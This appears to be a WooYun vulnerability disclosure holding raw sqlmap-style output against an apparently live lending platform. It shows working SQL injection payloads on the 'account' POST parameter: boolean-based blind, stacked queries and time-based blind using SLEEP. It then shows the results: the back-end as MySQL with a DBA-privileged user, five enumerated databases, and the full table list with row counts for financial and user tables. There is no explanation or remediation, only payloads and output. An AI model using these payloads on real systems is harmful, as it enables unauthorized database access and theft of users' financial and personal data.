WooYun.org

---
Parameter: account (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: account=-8043') OR 2328=2328 AND ('QPsY'='QPsY&code=94102&step=1
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: account=1');(SELECT * FROM (SELECT(SLEEP(5)))cueQ)#&code=94102&step=1
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
    Payload: account=1') OR (SELECT * FROM (SELECT(SLEEP(5)))MlQo) AND ('Wzah'='Wzah&code=94102&step=1
---
web application technology: PHP 5.5.21, Nginx
back-end DBMS: MySQL 5.0.11
current user:    'ltd@%'
current user is DBA:    True
available databases [5]:
[*] information_schema
[*] ltd
[*] ltd_test
[*] mysql
[*] performance_schema
Database: ltd
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| ltd_journal_account    | 63565   |
| ltd_jifen_log          | 53052   |
| ltd_ips_return         | 51210   |
| ltd_user_log           | 48718   |
| ltd_phone_log          | 37702   |
| ltd_account_log        | 35828   |
| ltd_borrow_repay       | 25746   |
| ltd_weixin_news        | 22315   |
| ltd_user_message       | 20712   |
| ltd_email_log          | 20555   |
| ltd_ips_before         | 19331   |
| ltd_account            | 15111   |
| ltd_user               | 15109   |
| ltd_user_info          | 15109   |
| ltd_user_status        | 15109   |
| ltd_user_vip           | 13047   |
| ltd_error_log          | 9101    |
| ltd_borrow_tender      | 8600    |
| ltd_user_spread        | 8324    |
| ltd_account_recharge   | 6397    |
| ltd_attachment         | 5925    |
| ltd_activity_log       | 5793    |
| ltd_account_cash       | 4018    |
| ltd_borrow_verify      | 669     |
| ltd_user_setting       | 396     |
| ltd_borrow_quota       | 344     |
| ltd_borrow             | 278     |
| ltd_document           | 251     |
| ltd_borrow_reward      | 204     |
| ltd_authmenu           | 177     |
| ltd_menu               | 169     |
| ltd_auth               | 158     |
| ltd_borrow_che         | 116     |
| ltd_rating_info        | 114     |
| ltd_attribute          | 85      |
| ltd_borrow_vouch       | 77      |
| ltd_borrow_vip         | 71      |
| ltd_borrow_register    | 66      |
| ltd_config             | 49      |
| ltd_user_auto          | 45      |
| ltd_borrow_pawn        | 40      |
| ltd_jifen_exchange     | 34      |
| ltd_user_address       | 32      |
| ltd_weixindy_reply     | 28      |
| ltd_borrow_novice      | 21      |
| ltd_jifen_product      | 19      |
| ltd_manage_member      | 18      |
| ltd_linkages           | 15      |
| ltd_template           | 14      |
| ltd_borrow_roam        | 12      |
| ltd_document_category  | 12      |
| ltd_weixin_menu        | 12      |
| ltd_model              | 10      |
| ltd_weixindy_menu      | 10      |
| ltd_manage_group       | 9       |
| ltd_remind             | 9       |
| ltd_borrow_category    | 8       |
| ltd_stock              | 8       |
| ltd_navigation         | 7       |
| ltd_addons             | 6       |
| ltd_borrow_credit      | 6       |
| ltd_borrow_institution | 6       |
| ltd_borrow_repayment   | 6       |
| ltd_topic_config       | 5       |
| ltd_autorepay_rule     | 4       |
| ltd_weixin_media       | 4       |
| ltd_api_account        | 3       |
| ltd_hooks              | 3       |
| ltd_user_autorepay     | 3       |
| ltd_user_group         | 3       |
| ltd_topic              | 2       |
| ltd_jifen_category     | 1       |
| ltd_topic_reply        | 1       |
| ltd_topic_signin       | 1       |
| ltd_weixin_repay       | 1       |
+------------------------+---------+